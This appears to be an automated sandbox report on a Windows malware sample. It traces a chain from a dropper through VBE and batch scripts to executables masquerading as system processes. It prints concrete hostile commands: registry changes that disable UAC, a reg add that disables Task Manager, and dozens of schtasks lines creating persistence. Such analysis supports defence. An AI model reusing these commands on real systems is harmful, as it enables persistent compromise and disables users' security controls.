description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BlockDriversession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" BlockDriversession.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" sysmon.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" sysmon.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 39 ipinfo.io 40 ipinfo.io -
Drops file in Program Files directory 10 IoCs
description ioc Process File created C:\Program Files\Windows Defender\en-US\sysmon.exe BlockDriversession.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\RCXAD0F.tmp BlockDriversession.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe BlockDriversession.exe File opened for modification C:\Program Files\Windows Defender\en-US\RCXC929.tmp BlockDriversession.exe File opened for modification C:\Program Files\Windows Defender\en-US\RCXC9A7.tmp BlockDriversession.exe File opened for modification C:\Program Files\Windows Defender\en-US\sysmon.exe BlockDriversession.exe File created C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe BlockDriversession.exe File created C:\Program Files (x86)\WindowsPowerShell\c82b8037eab33d BlockDriversession.exe File created C:\Program Files\Windows Defender\en-US\121e5b5079f7c0 BlockDriversession.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\RCXAD10.tmp BlockDriversession.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\24dbde2999530e BlockDriversession.exe File opened for modification C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\RCXA71F.tmp BlockDriversession.exe File opened for modification C:\Windows\Help\en-US\RCXCC29.tmp BlockDriversession.exe File opened for modification C:\Windows\Help\en-US\dwm.exe BlockDriversession.exe File created C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe BlockDriversession.exe File opened for modification C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe BlockDriversession.exe File created C:\Windows\Help\en-US\dwm.exe BlockDriversession.exe File created C:\Windows\Help\en-US\6cb0b6c459d5d3 BlockDriversession.exe File opened for modification C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\RCXA79D.tmp BlockDriversession.exe File opened for modification C:\Windows\Help\en-US\RCXCC28.tmp BlockDriversession.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings 1.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings BlockDriversession.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings sysmon.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings sysmon.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1660 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 51 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4060 schtasks.exe 4584 schtasks.exe 1068 schtasks.exe 4788 schtasks.exe 1992 schtasks.exe 4196 schtasks.exe 976 schtasks.exe 216 schtasks.exe 2220 schtasks.exe 4796 schtasks.exe 4932 schtasks.exe 3804 schtasks.exe 3976 schtasks.exe 4052 schtasks.exe 3752 schtasks.exe 1044 schtasks.exe 1428 schtasks.exe 2244 schtasks.exe 3728 schtasks.exe 2804 schtasks.exe 2404 schtasks.exe 1292 schtasks.exe 2364 schtasks.exe 4536 schtasks.exe 5012 schtasks.exe 3488 schtasks.exe 4828 schtasks.exe 2932 schtasks.exe 2396 schtasks.exe 4448 schtasks.exe 1392 schtasks.exe 2904 schtasks.exe 64 schtasks.exe 1472 schtasks.exe 2552 schtasks.exe 4112 schtasks.exe 1736 schtasks.exe 2716 schtasks.exe 2060 schtasks.exe 1852 schtasks.exe 2876 schtasks.exe 4004 schtasks.exe 1492 schtasks.exe 3236 schtasks.exe 3404 schtasks.exe 1612 schtasks.exe 2936 schtasks.exe 4500 schtasks.exe 3636 schtasks.exe 2568 schtasks.exe 3424 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 416 sysmon.exe 1224 sysmon.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 1508 BlockDriversession.exe Token: SeDebugPrivilege 416 sysmon.exe Token: SeBackupPrivilege 3780 vssvc.exe Token: SeRestorePrivilege 3780 vssvc.exe Token: SeAuditPrivilege 3780 vssvc.exe Token: SeDebugPrivilege 1224 sysmon.exe Token: SeDebugPrivilege 1408 sysmon.exe Token: SeDebugPrivilege 1992 sysmon.exe Token: SeDebugPrivilege 1428 sysmon.exe Token: SeDebugPrivilege 4296 sysmon.exe Token: SeDebugPrivilege 632 sysmon.exe Token: SeDebugPrivilege 2276 sysmon.exe Token: SeDebugPrivilege 4788 sysmon.exe Token: SeDebugPrivilege 4052 sysmon.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 416 sysmon.exe 1224 sysmon.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3556 wrote to memory of 2012 3556 1.exe 85 PID 3556 wrote to memory of 2012 3556 1.exe 85 PID 3556 wrote to memory of 2012 3556 1.exe 85 PID 2012 wrote to memory of 3628 2012 WScript.exe 93 PID 2012 wrote to memory of 3628 2012 WScript.exe 93 PID 2012 wrote to memory of 3628 2012 WScript.exe 93 PID 3628 wrote to memory of 1508 3628 cmd.exe 95 PID 3628 wrote to memory of 1508 3628 cmd.exe 95 PID 1508 wrote to memory of 4828 1508 BlockDriversession.exe 156 PID 1508 wrote to memory of 4828 1508 BlockDriversession.exe 156 PID 3628 wrote to memory of 1660 3628 cmd.exe 158 PID 3628 wrote to memory of 1660 3628 cmd.exe 158 PID 3628 wrote to memory of 1660 3628 cmd.exe 158 PID 4828 wrote to memory of 3772 4828 cmd.exe 159 PID 4828 wrote to memory of 3772 4828 cmd.exe 159 PID 4828 wrote to memory of 416 4828 cmd.exe 161 PID 4828 wrote to memory of 416 4828 cmd.exe 161 PID 416 wrote to memory of 4584 416 sysmon.exe 163 PID 416 wrote to memory of 4584 416 sysmon.exe 163 PID 416 wrote to memory of 3000 416 sysmon.exe 164 PID 416 wrote to memory of 3000 416 sysmon.exe 164 PID 416 wrote to memory of 692 416 sysmon.exe 179 PID 416 wrote to memory of 692 416 sysmon.exe 179 PID 416 wrote to memory of 2960 416 sysmon.exe 180 PID 416 wrote to memory of 2960 416 sysmon.exe 180 PID 416 wrote to memory of 844 416 sysmon.exe 181 PID 416 wrote to memory of 844 416 sysmon.exe 181 PID 416 wrote to memory of 3460 416 sysmon.exe 182 PID 416 wrote to memory of 3460 416 sysmon.exe 182 PID 416 wrote to memory of 5072 416 sysmon.exe 183 PID 416 wrote to memory of 5072 416 sysmon.exe 183 PID 416 wrote to memory of 4468 416 sysmon.exe 185 PID 416 wrote to memory of 4468 416 sysmon.exe 185 PID 416 wrote to memory of 3892 416 sysmon.exe 187 PID 416 wrote to memory of 3892 416 sysmon.exe 187 PID 416 wrote to memory of 388 416 sysmon.exe 191 PID 416 wrote to memory of 388 416 sysmon.exe 191 PID 844 wrote to memory of 3512 844 cmd.exe 195 PID 844 wrote to memory of 3512 844 cmd.exe 195 PID 692 wrote to memory of 3592 692 cmd.exe 196 PID 692 wrote to memory of 3592 692 cmd.exe 196 PID 4468 wrote to memory of 5040 4468 cmd.exe 197 PID 4468 wrote to memory of 5040 4468 cmd.exe 197 PID 5072 wrote to memory of 4520 5072 cmd.exe 198 PID 5072 wrote to memory of 4520 5072 cmd.exe 198 PID 2960 wrote to memory of 3544 2960 cmd.exe 199 PID 2960 wrote to memory of 3544 2960 cmd.exe 199 PID 3892 wrote to memory of 1068 3892 cmd.exe 200 PID 3892 wrote to memory of 1068 3892 cmd.exe 200 PID 388 wrote to memory of 2816 388 cmd.exe 201 PID 388 wrote to memory of 2816 388 cmd.exe 201 PID 3460 wrote to memory of 3380 3460 cmd.exe 203 PID 3460 wrote to memory of 3380 3460 cmd.exe 203 PID 4584 wrote to memory of 1224 4584 WScript.exe 205 PID 4584 wrote to memory of 1224 4584 WScript.exe 205 PID 844 wrote to memory of 1408 844 cmd.exe 206 PID 844 wrote to memory of 1408 844 cmd.exe 206 PID 692 wrote to memory of 1992 692 cmd.exe 207 PID 692 wrote to memory of 1992 692 cmd.exe 207 PID 2960 wrote to memory of 1428 2960 cmd.exe 208 PID 2960 wrote to memory of 1428 2960 cmd.exe 208 PID 388 wrote to memory of 4296 388 cmd.exe 210 PID 388 wrote to memory of 4296 388 cmd.exe 210 PID 5072 wrote to memory of 632 5072 cmd.exe 211 -
System policy modification 1 TTPs 9 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" BlockDriversession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" BlockDriversession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" BlockDriversession.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\browserperf\DnCoBuHIAvg.vbe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\browserperf\RcA8rkUQUHdsADqQUNtkjn.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\browserperf\BlockDriversession.exe"C:\browserperf\BlockDriversession.exe"4⤵
- Modifies WinLogon for persistence
- UAC bypass
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1508 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DgHlPzdV8W.bat"5⤵
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:26⤵PID:3772
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"6⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:416 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02a6598c-5b1d-4613-975d-28dd77e56082.vbs"7⤵
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\browserperf\sysmon.exeC:\browserperf\sysmon.exe8⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:1224 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2f4171b3-058b-4288-8dc4-85946c3d3649.vbs"9⤵PID:284
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cbf30c07-3da3-4ecc-8cbd-a9b05ca87505.vbs"9⤵PID:4224
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1643e7d5-e16c-4687-846d-a0757bf86570.vbs"7⤵PID:3000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zfOrxS71E3.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:3592
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\r0MODpJtud.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:3544
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QsS2ZSeOHk.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:3512
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eoRA4B8PWR.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:3380
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zlYgv4zteq.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:4520
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rBMLF9HJtT.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:5040
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YeeJHhLP1x.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:1068
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5wLWjZnu9K.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:2816
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1660
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2396
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\browserperf\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2220
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\browserperf\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\browserperf\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4584
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2936
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2364
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4796
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Documents\SearchApp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Users\Default\Documents\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Documents\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4500
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\browserperf\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4448
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2244
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\browserperf\sysmon.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\browserperf\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3728
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 10 /tr "'C:\browserperf\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4004
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\3D Objects\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2804
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Admin\3D Objects\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\3D Objects\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3636
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 8 /tr "'C:\browserperf\upfc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1068
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\browserperf\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\browserperf\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1292
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Users\Public\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3804
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Public\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Users\Public\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2568
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\browserperf\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4788
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\browserperf\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3424
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\browserperf\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1492
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\browserperf\unsecapp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\browserperf\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\browserperf\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5012
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\browserperf\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1392
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3752
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1736
-
